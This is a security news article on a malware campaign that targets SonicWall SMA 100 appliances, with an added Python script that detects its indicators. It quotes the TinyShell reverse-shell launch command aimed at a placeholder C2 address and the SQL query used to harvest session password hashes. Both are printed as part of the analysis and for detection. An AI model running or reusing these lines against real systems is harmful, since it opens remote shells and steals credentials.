Malware targets SonicWall SMA 100 Series appliances
Mandiant researchers have discovered a malware campaign that targets SonicWall SMA 100 Series appliances and is thought to have originated in China.
The malware was most likely introduced in 2021 and has proven extremely resilient, surviving firmware upgrades. Its primary goal is to steal user credentials and to give the attacker high-privileged access through a variant of the open-source TinyShell Unix backdoor.
The malware is made up of a series of bash scripts and a single TinyShell variant ELF binary. The overall behavior of the malicious bash script suite demonstrates a thorough understanding of the appliance and is well tailored to the system in order to provide stability and persistence.
The SMA 100 Series is a secure remote access appliance that lets remote users log in to company resources through a single sign-on (SSO) web portal, so intercepting user credentials at this chokepoint gives the attacker a direct route to sensitive internal resources.
The main malware entry point is a bash script called firewalld, whose main loop is nested so that it executes once for the square of the number of files on the system, in effect a very long-running loop: "… for j in $(ls / -R); do for i in $(ls / -R); do …". The script is responsible for running a SQL command that steals credentials and for launching the other components.
The firewalld startup function launches the TinyShell backdoor binary, named httpsd, with the command "nohup /bin/httpsd -c <C2 IP ADDRESS> -d 5 -m -1 -p 51432 > /dev/null 2>&1 &" if no httpsd process is already running. This instructs TinyShell to run in reverse-shell mode and to call out to the specified IP address and port at the time and day given by the -m flag, with the beacon interval set by the -d flag. If no IP address is supplied, the binary falls back to a hardcoded IP address for reverse-shell mode. It can also be run in listening (bind-shell) mode.
The malware’s primary goal appears to be stealing the hashed credentials of every logged-in user. In firewalld, this is done by periodically running the SQL query "select userName,password from Sessions" against the sqlite3 database /tmp/temp.db and writing the results to the attacker-created text file /tmp/syslog.db. The appliance stores session information, including hashed credentials, in /tmp/temp.db. Once the attacker retrieves the copied hashes, they can be cracked offline.
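The following is an added example, not Mandiant's or SonicWall's tooling, showing how the host-level indicators given above can be checked on an appliance: an httpsd process launched with the TinyShell reverse-shell port 51432, a bash process running a script named firewalld, and the attacker-created file /tmp/syslog.db. The process list is taken as one command line per entry (as "ps -eo args" prints it) and the file list as plain paths. The sample data at the bottom is constructed; the C2 address 203.0.113.10, the script location under /tmp and the name of the legitimate web server (httpd) are assumptions, not details from the report.

```python
"""Indicator check for the SMA 100 TinyShell campaign (constructed example)."""
import os
from typing import Dict, Iterable, List, NamedTuple

# From the launch command quoted in the article:
#   nohup /bin/httpsd -c<C2 IP ADDRESS> -d 5 -m -1 -p 51432 > /dev/null 2>&1 &
TINYSHELL_BINARY = "httpsd"
TINYSHELL_PORT = "51432"
# Attacker-created copy of the harvested Sessions rows (from the article).
HARVEST_FILE = "/tmp/syslog.db"
# Name of the malicious bash loader script (from the article).
LOADER_SCRIPT = "firewalld"
SHELLS = {"bash", "sh"}


class Finding(NamedTuple):
    severity: str
    indicator: str
    evidence: str


def parse_short_opts(argv: List[str]) -> Dict[str, str]:
    """Collect the single-letter options TinyShell takes (-c, -d, -m, -p).

    Both '-p 51432' and '-p51432' are accepted, because the article shows the
    C2 address glued to its flag ('-c<C2 IP ADDRESS>').
    """
    opts: Dict[str, str] = {}
    i = 1
    while i < len(argv):
        tok = argv[i]
        if len(tok) >= 2 and tok[0] == "-" and tok[1] in "cdmp":
            if len(tok) > 2:
                opts[tok[1]] = tok[2:]
            elif i + 1 < len(argv):
                opts[tok[1]] = argv[i + 1]
                i += 1
        i += 1
    return opts


def check_process_list(cmdlines: Iterable[str]) -> List[Finding]:
    """Flag httpsd beaconing on the TinyShell port and bash running firewalld."""
    findings: List[Finding] = []
    for line in cmdlines:
        argv = line.split()
        if not argv:
            continue
        prog = os.path.basename(argv[0])
        if prog == TINYSHELL_BINARY:
            opts = parse_short_opts(argv)
            if opts.get("p") == TINYSHELL_PORT:
                findings.append(Finding("high", "tinyshell-reverse-shell", line))
            else:
                # Same unusual binary name, different arguments: still worth a look.
                findings.append(Finding("medium", "unexpected-httpsd", line))
        elif prog in SHELLS and any(
            os.path.basename(a) == LOADER_SCRIPT for a in argv[1:]
        ):
            findings.append(Finding("medium", "firewalld-bash-loader", line))
    return findings


def check_paths(paths: Iterable[str]) -> List[Finding]:
    """Flag the attacker-created credential dump, tolerating odd path spellings."""
    return [
        Finding("high", "credential-harvest-file", p)
        for p in paths
        if os.path.normpath(p) == HARVEST_FILE
    ]


def scan(cmdlines: Iterable[str], paths: Iterable[str]) -> List[Finding]:
    return check_process_list(cmdlines) + check_paths(paths)


# Constructed sample data: 203.0.113.10 is a TEST-NET-3 documentation address,
# /tmp/firewalld is a hypothetical script location, and httpd is an assumed
# name for the appliance's legitimate web server.
SAMPLE_PS = [
    "/usr/sbin/sshd -D",
    "/usr/sbin/httpd -k start",
    "/bin/httpsd -c203.0.113.10 -d 5 -m -1 -p 51432",
    "/bin/bash /tmp/firewalld",
]
SAMPLE_PATHS = ["/tmp/temp.db", "/tmp/syslog.db", "/var/log/messages"]

if __name__ == "__main__":
    for f in scan(SAMPLE_PS, SAMPLE_PATHS):
        print(f"[{f.severity}] {f.indicator}: {f.evidence}")
```

On a real appliance the two input lists would come from the process table and from a walk of /tmp; the legitimate web server is reported only if it happens to be named httpsd, and a bash process whose script basename is firewalld is graded medium rather than high because the article gives the script's name but not its location.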
The researchers worked with SonicWall’s Product Security and Incident Response Team (PSIRT) to analyze an infected device and found that the attackers had invested considerable effort in making their tooling stable and persistent. Every ten seconds the malware checks whether a firmware upgrade is pending and, if so, injects itself into the upgrade so that credential harvesting continues after the appliance is updated.
The sources for this piece include an article in Malwarebytes.